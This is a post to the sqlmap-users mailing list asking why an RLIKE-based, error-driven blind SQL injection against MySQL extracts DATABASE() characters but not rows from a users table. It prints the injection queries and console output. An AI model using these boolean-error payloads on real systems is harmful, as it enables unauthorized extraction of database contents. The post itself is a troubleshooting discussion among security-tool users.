Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances.
As you can see in the output below, the user can select the first name value from the users table (which is ‘admin’). When using RLIKE to test the first character returned with DATABASE() (a ‘p’), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting ‘a’. But when you select the first row from the users table and grab the first character (an ‘a’), no exception is thrown and an empty result set is returned. Any thoughts? mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); Empty set (0.01 sec) mysql> SELECT `name` from users LIMIT 0,1; +-------+ | name | +-------+ | admin | +-------+ 1 row in set (0.00 sec) mysql>
signature.asc
Description: Message signed with OpenPGP using GPGMail
------------------------------------------------------------------------------ Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server from Actuate! Instantly Supercharge Your Business Reports and Dashboards with Interactivity, Sharing, Native Excel Exports, App Integration & more Get technology previously reserved for billion-dollar corporations, FREE http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
